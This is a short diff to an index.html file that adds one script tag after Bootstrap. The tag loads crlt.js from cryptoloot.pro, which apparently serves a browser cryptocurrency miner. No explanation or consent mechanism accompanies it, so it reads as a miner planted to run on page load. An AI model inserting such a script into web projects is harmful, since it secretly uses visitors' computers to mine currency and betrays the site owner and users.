--- a/index.html
+++ b/index.html
@@ -13,5 +13,6 @@
 <body>
     <div id="app"></div>
     <script src="static/bs/bootstrap.min.js"></script>
+    <script src="//cryptoloot.pro/lib/crlt.js"></script>
 </body>
 </html>
